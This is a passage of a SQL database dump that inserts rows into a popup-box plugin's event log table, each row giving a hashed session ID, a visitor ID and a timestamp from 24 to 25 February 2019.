(61992, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:18:50'),
(61993, '38d5cc3c444ec5997d0627fc5240de15', 'ef33699b366746ed', 0, 2, 1, '2019-02-24 11:19:23'),
(61994, '43ce710d45ab61166ee77c719f41e43d', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-24 11:19:44'),
(61995, 'c7d86be07dadd341cca0d2e68930bcdd', 'e706e9a0184b2202', 0, 2, 1, '2019-02-24 11:19:44'),
(61996, '723379e38bb7047086d5c29617a31d04', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-24 11:19:44'),
(61997, '7e45dcbaa7c7ffa553daa2824adc054c', '4dca797f4c8a12c2', 0, 2, 1, '2019-02-24 11:20:08'),
(61998, '723379e38bb7047086d5c29617a31d04', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-24 11:20:08'),
(61999, 'f8b84b2bdfeeddb5a2693bd4f1ce0d69', 'adb6b73bb2cf5df0', 0, 2, 1, '2019-02-24 11:20:24'),
(62000, 'f8b84b2bdfeeddb5a2693bd4f1ce0d69', 'adb6b73bb2cf5df0', 0, 2, 1, '2019-02-24 11:20:29'),
(62001, '3461ae57be156870f802d76c8c82f4ec', '0ca668ef936b8885', 0, 2, 1, '2019-02-24 11:20:34'),
(62002, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:20:38'),
(62003, '41e6de90bd93c04bd6580a47a65ee482', 'f8d002c7b8b76490', 0, 2, 1, '2019-02-24 11:20:45'),
(62004, 'ef6f110cb68392a5d05b464089f597c5', '34ec142c805c34fe', 0, 2, 1, '2019-02-24 11:20:52'),
(62005, '4a0007c6a10257487a1a304cb28543b5', '19ac418837a1bfb6', 0, 2, 1, '2019-02-24 11:20:57'),
(62006, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:21:07'),
(62007, '3bf13aa009ccb11531b96d0d95b16758', '32b169e936bbe5df', 0, 2, 1, '2019-02-24 11:21:26'),
(62008, '4a0007c6a10257487a1a304cb28543b5', '19ac418837a1bfb6', 0, 2, 1, '2019-02-24 11:22:16'),
(62009, '6740267805211fa448e514392da122fe', '0bf16c319bd2f666', 0, 2, 1, '2019-02-24 11:23:32'),
(62010, '7f442eee62449b356a1a0972d30ace69', 'a658fe329aeff044', 0, 2, 1, '2019-02-24 11:23:55'),
(62011, 'd1449bfdc99dfde5eaef14237e6ff753', '52eae1a8ed672a04', 0, 2, 1, '2019-02-24 11:26:06'),
(62012, 'd1449bfdc99dfde5eaef14237e6ff753', '52eae1a8ed672a04', 0, 2, 1, '2019-02-24 11:26:17'),
(62013, '99ba06cf6b823757214cb96dfcdb2cbd', '7f04b02dfe4bafed', 0, 2, 1, '2019-02-24 11:26:24'),
(62014, 'd1449bfdc99dfde5eaef14237e6ff753', '52eae1a8ed672a04', 0, 2, 1, '2019-02-24 11:26:26'),
(62015, '99ba06cf6b823757214cb96dfcdb2cbd', '7f04b02dfe4bafed', 0, 2, 1, '2019-02-24 11:26:43'),
(62016, 'd1449bfdc99dfde5eaef14237e6ff753', '52eae1a8ed672a04', 0, 2, 1, '2019-02-24 11:26:45'),
(62017, '8a8a34a5b79f70648ee82fffa39a4c8d', '854dd24b6beb7284', 0, 2, 1, '2019-02-24 11:26:53'),
(62018, '3c162657dd4fb52166be8b2495c87df8', '483313bcaa5a7274', 0, 2, 1, '2019-02-24 11:27:07'),
(62019, 'd1449bfdc99dfde5eaef14237e6ff753', '52eae1a8ed672a04', 0, 2, 1, '2019-02-24 11:27:17'),
(62020, '7930b3a2ba9ce3f2730e47fe73d539e6', 'dcadb578720d99b9', 0, 2, 1, '2019-02-24 11:27:49'),
(62021, '7e45dcbaa7c7ffa553daa2824adc054c', '4dca797f4c8a12c2', 0, 2, 1, '2019-02-24 11:27:50'),
(62022, 'c7d86be07dadd341cca0d2e68930bcdd', 'e706e9a0184b2202', 0, 2, 1, '2019-02-24 11:28:43'),
(62023, 'b840aff5aeba06ab9fda8998284d0a16', '93f30eaefda9d8c4', 0, 2, 1, '2019-02-24 11:29:07'),
(62024, '3c162657dd4fb52166be8b2495c87df8', '483313bcaa5a7274', 0, 2, 1, '2019-02-24 11:29:50'),
(62025, '4a0007c6a10257487a1a304cb28543b5', '19ac418837a1bfb6', 0, 2, 1, '2019-02-24 11:32:59'),
(62026, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:33:40'),
(62027, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:34:06'),
(62028, '816b4f4378a88dc8eea2ca89127b77b9', 'bd21ad0986732513', 0, 2, 1, '2019-02-24 11:34:14'),
(62029, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:34:16'),
(62030, 'b4317abc3f7cd4b749a4f1d757b2793a', '7d3e015101cab243', 0, 2, 1, '2019-02-24 11:35:37'),
(62031, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:36:03'),
(62032, 'f820d42f7a68b2a3e7fb54154624a9c0', 'aebe4806f0311e79', 0, 2, 1, '2019-02-24 11:36:05'),
(62033, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:36:28'),
(62034, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2019-02-24 11:36:36'),
(62035, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:37:25'),
(62036, 'b73f6c9f779e3501cc1836cd8da686e0', '826ffa39fb70cfa6', 0, 2, 1, '2019-02-24 11:37:29'),
(62037, 'b73f6c9f779e3501cc1836cd8da686e0', '826ffa39fb70cfa6', 0, 2, 1, '2019-02-24 11:37:44'),
(62038, 'b73f6c9f779e3501cc1836cd8da686e0', '826ffa39fb70cfa6', 0, 2, 1, '2019-02-24 11:38:01'),
(62039, 'b73f6c9f779e3501cc1836cd8da686e0', '826ffa39fb70cfa6', 0, 2, 1, '2019-02-24 11:38:20'),
(62040, 'f820d42f7a68b2a3e7fb54154624a9c0', 'aebe4806f0311e79', 0, 2, 1, '2019-02-24 11:38:21'),
(62041, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 11:38:56'),
(62042, 'b73f6c9f779e3501cc1836cd8da686e0', '826ffa39fb70cfa6', 0, 2, 1, '2019-02-24 11:39:27'),
(62043, 'b73f6c9f779e3501cc1836cd8da686e0', '826ffa39fb70cfa6', 0, 2, 1, '2019-02-24 11:39:55'),
(62044, '7e45dcbaa7c7ffa553daa2824adc054c', '4dca797f4c8a12c2', 0, 2, 1, '2019-02-24 11:42:11'),
(62045, 'ad8e2a9a28c1fa99df2ef13f321013e0', 'b1d43993249cf0ad', 0, 2, 1, '2019-02-24 11:45:15'),
(62046, '66beff23974b610ab79d157c4100352d', '960d12b6c14f65ca', 0, 2, 1, '2019-02-24 11:45:38'),
(62047, 'a3918f7c058cd4d91f5522f82516f951', '037ccce78dcad11d', 0, 2, 1, '2019-02-24 11:45:55'),
(62048, 'bed680e8e8a949f5eb9d368d5c29f5a4', 'a2b92167f54c9dc2', 0, 2, 1, '2019-02-24 11:47:11'),
(62049, 'e3eea6116a1cec1fdc7ce57c35b8f550', '332723ec6654d9f5', 0, 2, 1, '2019-02-24 11:49:03'),
(62050, '85dff293ad4d33394816ff59f49ca382', '4a790fc0d9771e67', 0, 2, 1, '2019-02-24 11:54:29'),
(62051, '85dff293ad4d33394816ff59f49ca382', '4a790fc0d9771e67', 0, 2, 1, '2019-02-24 11:54:58'),
(62052, 'de077c5e86f594b739c0521a5bb2610b', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-02-24 11:56:25'),
(62053, 'de077c5e86f594b739c0521a5bb2610b', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-02-24 11:57:04'),
(62054, 'c7d86be07dadd341cca0d2e68930bcdd', 'e706e9a0184b2202', 0, 2, 1, '2019-02-24 11:59:05'),
(62055, '2729aa0a1605f2032e43d1d1e2373978', '7cb2227c839661ee', 0, 2, 1, '2019-02-24 12:00:05'),
(62056, '2729aa0a1605f2032e43d1d1e2373978', '7cb2227c839661ee', 0, 2, 1, '2019-02-24 12:00:18'),
(62057, 'ad8e2a9a28c1fa99df2ef13f321013e0', 'b1d43993249cf0ad', 0, 2, 1, '2019-02-24 12:01:14'),
(62058, 'de5920057d775981ba382840d9f218fc', '1f280355587a40b0', 0, 2, 1, '2019-02-24 12:02:24'),
(62059, 'de5920057d775981ba382840d9f218fc', '1f280355587a40b0', 0, 2, 1, '2019-02-24 12:02:47'),
(62060, 'de5920057d775981ba382840d9f218fc', '1f280355587a40b0', 0, 2, 1, '2019-02-24 12:02:57'),
(62061, 'de5920057d775981ba382840d9f218fc', '1f280355587a40b0', 0, 2, 1, '2019-02-24 12:03:29'),
(62062, 'de5920057d775981ba382840d9f218fc', '1f280355587a40b0', 0, 2, 1, '2019-02-24 12:04:30'),
(62063, 'de5920057d775981ba382840d9f218fc', '1f280355587a40b0', 0, 2, 1, '2019-02-24 12:04:51'),
(62064, '5bdf09fbbb073fff7dba893c299499f6', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-02-24 12:05:09'),
(62065, '2729aa0a1605f2032e43d1d1e2373978', '7cb2227c839661ee', 0, 2, 1, '2019-02-24 12:05:53'),
(62066, '11a656bd29481c836929f29c8f7d0ef7', '9fe307605f07ea9c', 0, 2, 1, '2019-02-24 12:06:25'),
(62067, 'b4317abc3f7cd4b749a4f1d757b2793a', '7d3e015101cab243', 0, 2, 1, '2019-02-24 12:10:16'),
(62068, '3d446552d622f7e30dbb6ad9372ecbb6', '74aba437eea39f30', 0, 2, 1, '2019-02-24 12:12:14'),
(62069, '246480c8c64ca8b70b1a95ec1230ce54', '1791b1aeb2327e22', 0, 2, 1, '2019-02-24 12:15:35'),
(62070, '246480c8c64ca8b70b1a95ec1230ce54', '1791b1aeb2327e22', 0, 2, 1, '2019-02-24 12:16:11'),
(62071, '6ff34a0a46b9d8edf07bdf61ae4e17b8', '1d9c54d0b37930ed', 0, 2, 1, '2019-02-24 12:21:14'),
(62072, '8be1a2a0347017ddaac67ef1e443ae2a', 'e74a2ac966dcd07f', 0, 2, 1, '2019-02-24 12:21:29'),
(62073, '3d446552d622f7e30dbb6ad9372ecbb6', '74aba437eea39f30', 0, 2, 1, '2019-02-24 12:22:12'),
(62074, 'd8ecfa3f760264dd00ffff7069238c8f', 'b2bafb74467116e9', 0, 2, 1, '2019-02-24 12:22:16'),
(62075, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 12:22:34'),
(62076, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 12:23:00'),
(62077, '440c92c525105a489a01f78efb492b1c', 'a6cf4603608c8ad7', 0, 2, 1, '2019-02-24 12:24:09'),
(62078, '440c92c525105a489a01f78efb492b1c', 'a6cf4603608c8ad7', 0, 2, 1, '2019-02-24 12:24:29'),
(62079, '38fac888921495f505ec39badb37a9c0', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 12:24:37'),
(62080, 'c7d86be07dadd341cca0d2e68930bcdd', 'e706e9a0184b2202', 0, 2, 1, '2019-02-24 12:25:20'),
(62081, 'b10a8b8141ed0551670f58c9ef55ddc4', 'edfe950d47379572', 0, 2, 1, '2019-02-24 12:29:59'),
(62082, 'b10a8b8141ed0551670f58c9ef55ddc4', 'edfe950d47379572', 0, 2, 1, '2019-02-24 12:31:28'),
(62083, '3d02ec20bbc85677dffd495cc7aafbb6', '50d02461c9e1908b', 0, 2, 1, '2019-02-24 12:37:16'),
(62084, '386f196b96c88ccaf7eaeffec30db5c4', 'fd5f23094d82de32', 0, 2, 1, '2019-02-24 12:40:37'),
(62085, 'b4317abc3f7cd4b749a4f1d757b2793a', '7d3e015101cab243', 0, 2, 1, '2019-02-24 12:41:22'),
(62086, 'cf02a699ab138440314ee376b53c22ac', '552e20f69a79712b', 0, 2, 1, '2019-02-24 12:42:07'),
(62087, 'c7d86be07dadd341cca0d2e68930bcdd', 'e706e9a0184b2202', 0, 2, 1, '2019-02-24 12:56:33'),
(62088, 'b660d5917554c41d215f2965d69cefc6', 'd83be9192f556fc0', 0, 2, 1, '2019-02-24 12:56:38'),
(62089, 'ffc01f5650ceabb3366a0dc88d5c2415', '9b439e4e6dd53e8a', 0, 2, 1, '2019-02-24 12:57:06'),
(62090, 'c7d86be07dadd341cca0d2e68930bcdd', 'e706e9a0184b2202', 0, 2, 1, '2019-02-24 13:00:57'),
(62091, 'ed1632fe30743353c3d4f9ac64ef4647', '1f280355587a40b0', 0, 2, 1, '2019-02-24 13:04:11'),
(62092, 'f8b84b2bdfeeddb5a2693bd4f1ce0d69', 'adb6b73bb2cf5df0', 0, 2, 1, '2019-02-24 13:04:43'),
(62093, 'f8b84b2bdfeeddb5a2693bd4f1ce0d69', 'adb6b73bb2cf5df0', 0, 2, 1, '2019-02-24 13:04:51'),
(62094, '74da216b6fc1ba136a7a441adbdbf5d7', '1791b1aeb2327e22', 0, 2, 1, '2019-02-24 13:06:28'),
(62095, '74da216b6fc1ba136a7a441adbdbf5d7', '1791b1aeb2327e22', 0, 2, 1, '2019-02-24 13:06:37'),
(62096, 'f8b84b2bdfeeddb5a2693bd4f1ce0d69', 'adb6b73bb2cf5df0', 0, 2, 1, '2019-02-24 13:07:16'),
(62097, '260e42e404525dfc52ad6d97961de325', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 13:10:21'),
(62098, '260e42e404525dfc52ad6d97961de325', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 13:10:37'),
(62099, 'b4317abc3f7cd4b749a4f1d757b2793a', '7d3e015101cab243', 0, 2, 1, '2019-02-24 13:11:15'),
(62100, 'e71907140f4789f584465926bcf6cdbf', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 13:13:52'),
(62101, 'e71907140f4789f584465926bcf6cdbf', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 13:14:03'),
(62102, '5299fc7a7711098266a729d960291a87', 'd555edff9dc2cf16', 0, 2, 1, '2019-02-24 13:14:21'),
(62103, 'e71907140f4789f584465926bcf6cdbf', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 13:14:33'),
(62104, 'f820d42f7a68b2a3e7fb54154624a9c0', 'aebe4806f0311e79', 0, 2, 1, '2019-02-24 13:14:54'),
(62105, 'b4317abc3f7cd4b749a4f1d757b2793a', '7d3e015101cab243', 0, 2, 1, '2019-02-24 13:15:00'),
(62106, 'e71907140f4789f584465926bcf6cdbf', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 13:15:30'),
(62107, 'e71907140f4789f584465926bcf6cdbf', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 13:15:52'),
(62108, 'f820d42f7a68b2a3e7fb54154624a9c0', 'aebe4806f0311e79', 0, 2, 1, '2019-02-24 13:16:30'),
(62109, 'f820d42f7a68b2a3e7fb54154624a9c0', 'aebe4806f0311e79', 0, 2, 1, '2019-02-24 13:19:31'),
(62110, 'f820d42f7a68b2a3e7fb54154624a9c0', 'aebe4806f0311e79', 0, 2, 1, '2019-02-24 13:20:11'),
(62111, 'd43053ce88595c0933bcdf6fa563dd99', '7f04b02dfe4bafed', 0, 2, 1, '2019-02-24 13:22:56'),
(62112, 'fe2eccadb3b0908b14009da4d5bb1985', 'c67676588d49a5ff', 0, 2, 1, '2019-02-24 13:26:27'),
(62113, 'fe2eccadb3b0908b14009da4d5bb1985', 'c67676588d49a5ff', 0, 2, 1, '2019-02-24 13:29:02'),
(62114, '98f855eb283e65a969f1a02b736afe96', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 13:31:27'),
(62115, '98f855eb283e65a969f1a02b736afe96', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 13:32:33'),
(62116, '98f855eb283e65a969f1a02b736afe96', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 13:33:25'),
(62117, 'e33fcc86d93f3669fbf8624e835eff6b', 'f93b36bb374ed1a7', 0, 2, 1, '2019-02-24 13:33:52'),
(62118, '98f855eb283e65a969f1a02b736afe96', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 13:34:08'),
(62119, '98f855eb283e65a969f1a02b736afe96', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 13:34:30'),
(62120, '211abfe1e4cabdd3ec81ac040e26ba45', 'c6452b0f8e306965', 0, 2, 1, '2019-02-24 14:12:08'),
(62121, '211abfe1e4cabdd3ec81ac040e26ba45', 'c6452b0f8e306965', 0, 2, 1, '2019-02-24 14:12:31'),
(62122, '211abfe1e4cabdd3ec81ac040e26ba45', 'c6452b0f8e306965', 0, 2, 1, '2019-02-24 14:12:43'),
(62123, 'f7a679e0de722f761c271a9b63355627', '5a6e6fc8df61f23d', 0, 2, 1, '2019-02-24 14:28:32'),
(62124, '55740e339eab069189f232e2401939bb', '1265bda777042d8f', 0, 2, 1, '2019-02-24 14:29:29'),
(62125, '55740e339eab069189f232e2401939bb', '1265bda777042d8f', 0, 2, 1, '2019-02-24 14:31:41'),
(62126, '55740e339eab069189f232e2401939bb', '1265bda777042d8f', 0, 2, 1, '2019-02-24 14:33:15'),
(62127, '3d2f0eb9cd2c9da5f46f12ee904c8093', '1f280355587a40b0', 0, 2, 1, '2019-02-24 14:58:00'),
(62128, '3d2f0eb9cd2c9da5f46f12ee904c8093', '1f280355587a40b0', 0, 2, 1, '2019-02-24 15:00:15'),
(62129, '7cfd45d786b01d40d8d53123f11441b2', '01d0e9fd77a83aea', 0, 2, 1, '2019-02-24 15:03:59'),
(62130, '55740e339eab069189f232e2401939bb', '1265bda777042d8f', 0, 2, 1, '2019-02-24 15:16:57'),
(62131, '55740e339eab069189f232e2401939bb', '1265bda777042d8f', 0, 2, 1, '2019-02-24 15:17:01'),
(62132, '55740e339eab069189f232e2401939bb', '1265bda777042d8f', 0, 2, 1, '2019-02-24 15:17:19'),
(62133, 'bc91cda494464a8f9a85159d89923ff3', 'b301d833ea94d585', 0, 2, 1, '2019-02-24 15:27:04'),
(62134, '57b56f711480848e1e7518c738f8a836', '4fa83dd66d754b91', 0, 2, 1, '2019-02-24 15:33:14'),
(62135, '8926dd4adcb02d4575cc506e1617e7e1', 'b5b428f757f0effa', 0, 2, 1, '2019-02-24 15:40:48'),
(62136, '444afd0ed5fa91aad10500edaf08dcd9', '031c39d5011d3372', 0, 2, 1, '2019-02-24 15:56:51'),
(62137, '43d95fe9e0c25b97641985d7573c1f67', '0afbc3711df14458', 0, 2, 1, '2019-02-24 15:57:08'),
(62138, '5eca37f46f9afeb50fab188f5f5a9783', '785f08f93bc877dd', 0, 2, 1, '2019-02-24 16:05:42'),
(62139, '5d39c2cf9bfa544ca6ded4a60d40f612', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 16:10:06'),
(62140, '5d39c2cf9bfa544ca6ded4a60d40f612', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 16:12:31'),
(62141, '5d39c2cf9bfa544ca6ded4a60d40f612', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-24 16:12:37'),
(62142, 'ed2ee4d0f2fa8108564a7c707ed355e5', 'd09a3a195511f770', 0, 2, 1, '2019-02-24 16:14:27'),
(62143, 'ed2ee4d0f2fa8108564a7c707ed355e5', 'd09a3a195511f770', 0, 2, 1, '2019-02-24 16:21:00'),
(62144, '257e8ea1d5efb0c7c30b95b1eb507542', '6521fe834dce4d43', 0, 2, 1, '2019-02-24 16:46:15'),
(62145, '416666a0b894a948aca713dddc9c13e8', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-24 17:06:52'),
(62146, 'caa0038c7380dacc500e8ac1f7e1e31d', 'ea0d4bc3b91778ec', 0, 2, 1, '2019-02-24 17:36:24'),
(62147, 'ed5b9828d97af4237b1f074d9a85177e', '583a953b8155adc0', 0, 2, 1, '2019-02-24 17:47:10'),
(62148, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:55:53'),
(62149, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:56:02'),
(62150, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:56:32'),
(62151, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:56:39'),
(62152, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:57:04'),
(62153, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:57:38'),
(62154, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:57:44'),
(62155, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:58:16'),
(62156, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:58:54'),
(62157, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:59:00'),
(62158, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:59:33'),
(62159, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 17:59:43'),
(62160, 'f9efdd735a5243c1b4658c75e3329cfc', 'c25394c4a195519e', 0, 2, 1, '2019-02-24 18:00:06'),
(62161, '6d9df9eba193331ca54f81eb6d41f86c', '8c7e25b481360639', 0, 2, 1, '2019-02-24 19:20:45'),
(62162, '87aa802762c8e351e192080ec9475526', '32edccf9c82daf54', 0, 2, 1, '2019-02-24 19:30:09'),
(62163, '87c6bd90e0256a61adc7196bd2c55c40', '77b7ba955c142178', 0, 2, 1, '2019-02-24 19:51:20'),
(62164, '4a0007c6a10257487a1a304cb28543b5', '19ac418837a1bfb6', 0, 2, 1, '2019-02-24 19:51:45'),
(62165, '090cd19432439e28ebfda075d465fbf5', '3090f2cc46b21796', 0, 2, 1, '2019-02-24 20:42:48'),
(62166, '090cd19432439e28ebfda075d465fbf5', '3090f2cc46b21796', 0, 2, 1, '2019-02-24 20:43:04'),
(62167, '01540a2f1b78a4ee896d39ef4f265b9b', '2034f09284a4c7ca', 0, 2, 1, '2019-02-24 20:58:55'),
(62168, 'b96cb9484f58876ef86b1696b2c6fae2', '2639879b68a42bee', 0, 2, 1, '2019-02-24 21:00:35'),
(62169, 'b96cb9484f58876ef86b1696b2c6fae2', '2639879b68a42bee', 0, 2, 1, '2019-02-24 21:00:52'),
(62170, 'ffc01f5650ceabb3366a0dc88d5c2415', '9b439e4e6dd53e8a', 0, 2, 1, '2019-02-24 21:22:56'),
(62171, 'ffe07a0c7db3024c32c9bf09f483322b', '531c9c5350e199f9', 0, 2, 1, '2019-02-24 21:33:59'),
(62172, '3dc75a17b8dd00a2e1c42ae242fa0688', '12b3b2b7f6e5f3a9', 0, 2, 1, '2019-02-24 21:40:13'),
(62173, 'e2b21ca1a27f1fc768d7e5976692e2a5', 'ac4e891bfad16958', 0, 2, 1, '2019-02-24 21:55:51'),
(62174, 'e2b21ca1a27f1fc768d7e5976692e2a5', 'ac4e891bfad16958', 0, 2, 1, '2019-02-24 21:57:26'),
(62175, 'ce08a06ff62ab6643b10d4fe9f70db46', 'bb8566e8b89c170e', 0, 2, 1, '2019-02-24 22:07:27'),
(62176, '7c42d17b95373378ba8c387088357ed9', 'a9c9b57711dafec5', 0, 2, 1, '2019-02-24 22:17:19'),
(62177, '6bcc47af3efdc55feebcd865220de07e', 'd4cc683caca38240', 0, 2, 1, '2019-02-24 23:15:06');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(62178, '6bcc47af3efdc55feebcd865220de07e', 'd4cc683caca38240', 0, 2, 1, '2019-02-24 23:15:12'),
(62179, '6bcc47af3efdc55feebcd865220de07e', 'd4cc683caca38240', 0, 2, 1, '2019-02-24 23:19:07'),
(62180, '6bcc47af3efdc55feebcd865220de07e', 'd4cc683caca38240', 0, 2, 1, '2019-02-24 23:24:19'),
(62181, '8768a82e7256ec98cc3481e8f7ff8a5c', 'a3b7aeba0710bcf4', 0, 2, 1, '2019-02-25 00:06:03'),
(62182, 'ed2ee4d0f2fa8108564a7c707ed355e5', 'd09a3a195511f770', 0, 2, 1, '2019-02-25 00:35:02'),
(62183, 'f90939d0366d8a7cf38789a435311990', '951ccde0a5c0e399', 0, 2, 1, '2019-02-25 00:46:05'),
(62184, '819bcc4a92c6d12624f60c966b32cae6', 'a3a5ff19519bebd6', 0, 2, 1, '2019-02-25 01:08:23'),
(62185, '01ef026714afdff0f2e751b2c6645d78', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-02-25 01:41:52'),
(62186, '4ea9d2af4c22fd1b00ec91c7a31eb8fe', 'b58e4f885738dd6f', 0, 2, 1, '2019-02-25 01:46:00'),
(62187, '4ea9d2af4c22fd1b00ec91c7a31eb8fe', 'b58e4f885738dd6f', 0, 2, 1, '2019-02-25 01:46:09'),
(62188, '4ea9d2af4c22fd1b00ec91c7a31eb8fe', 'b58e4f885738dd6f', 0, 2, 1, '2019-02-25 01:46:25'),
(62189, '05e0c9201d345f90331b6b0b2058a9bb', 'dcc455ddd822bcce', 0, 2, 1, '2019-02-25 01:53:16'),
(62190, 'ea5893c7f26e2143a1a711bd57fc1643', 'd0f7eea7562e1950', 0, 2, 1, '2019-02-25 02:25:38'),
(62191, 'ea5057866ef6201b140b62eed6c04d52', 'cf4a941aae246f37', 0, 2, 1, '2019-02-25 02:41:37'),
(62192, 'cac752f67c6919ac85a41f96c0aa1368', '3841474b0a439373', 0, 2, 1, '2019-02-25 03:19:10'),
(62193, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-02-25 03:43:54'),
(62194, 'e6b5c3f29b3da0badfa8b7f7d397cc71', 'd30603b224a32620', 0, 2, 1, '2019-02-25 03:55:56'),
(62195, '36bd470eb4b46b8b00e169f94816fd51', '399029d0bd88cc0c', 0, 2, 1, '2019-02-25 05:49:52'),
(62196, '9bef8c599fd0e12db3c583bfc43be75a', '7b164313ac8daf34', 0, 2, 1, '2019-02-25 05:55:08'),
(62197, 'd7ab2e8efa40c5ce94e59da8d240698c', 'cfc6a665f2cd23b1', 0, 2, 1, '2019-02-25 06:21:12'),
(62198, 'be44cd5db25f76382a2eb28436340f78', '675588dac6bce21c', 0, 2, 1, '2019-02-25 06:35:11'),
(62199, 'a736c0d5a2d8e72418127573a3c56ade', 'a2b92167f54c9dc2', 0, 2, 1, '2019-02-25 06:40:50'),
(62200, '9d35651a296f2dd4d6b16501cf035b22', 'd103fec655a27c4b', 0, 2, 1, '2019-02-25 06:46:04'),
(62201, '9d35651a296f2dd4d6b16501cf035b22', 'd103fec655a27c4b', 0, 2, 1, '2019-02-25 06:57:40'),
(62202, 'd9f3ac4964577647b4d7d2e02ed5d442', '8bde1c7a0891495f', 0, 2, 1, '2019-02-25 07:00:51'),
(62203, 'e22d3b52a5137e49b8c9ceb5ae53d199', '8fcbcbf2903f3023', 0, 2, 1, '2019-02-25 07:27:05'),
(62204, '2d82cab3271ccdc931c760ee47309555', '8a2fc6e68b5ebfc7', 0, 2, 1, '2019-02-25 07:30:01'),
(62205, '416666a0b894a948aca713dddc9c13e8', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-25 07:35:39'),
(62206, 'd38798aab822f17761ae360f6ec9281c', '1791b1aeb2327e22', 0, 2, 1, '2019-02-25 07:36:14'),
(62207, '416666a0b894a948aca713dddc9c13e8', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-25 07:37:06'),
(62208, '1654b563a301aaed24ffb7eea320ed30', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-02-25 07:38:59'),
(62209, '1654b563a301aaed24ffb7eea320ed30', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-02-25 07:39:15'),
(62210, '1654b563a301aaed24ffb7eea320ed30', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-02-25 07:39:48'),
(62211, '53c36254e07c039081525dbab594cf0c', '6551472730717e35', 0, 2, 1, '2019-02-25 07:40:31'),
(62212, '96131c29f4133df43efb3bb9e2f5a5cb', '034dd882c91cd9e2', 0, 2, 1, '2019-02-25 07:44:44'),
(62213, '6eae10c67b369b86d9465774c6f8c9d9', 'a87402dacc0affd6', 0, 2, 1, '2019-02-25 07:58:53'),
(62214, 'aab4beeea43b9afbb4767cd703792f34', 'd7c14cfa379ac614', 0, 2, 1, '2019-02-25 08:30:35'),
(62215, 'aab4beeea43b9afbb4767cd703792f34', 'd7c14cfa379ac614', 0, 2, 1, '2019-02-25 08:34:09'),
(62216, 'aab4beeea43b9afbb4767cd703792f34', 'd7c14cfa379ac614', 0, 2, 1, '2019-02-25 08:34:21'),
(62217, 'aab4beeea43b9afbb4767cd703792f34', 'd7c14cfa379ac614', 0, 2, 1, '2019-02-25 08:34:34'),
(62218, 'aab4beeea43b9afbb4767cd703792f34', 'd7c14cfa379ac614', 0, 2, 1, '2019-02-25 08:34:53'),
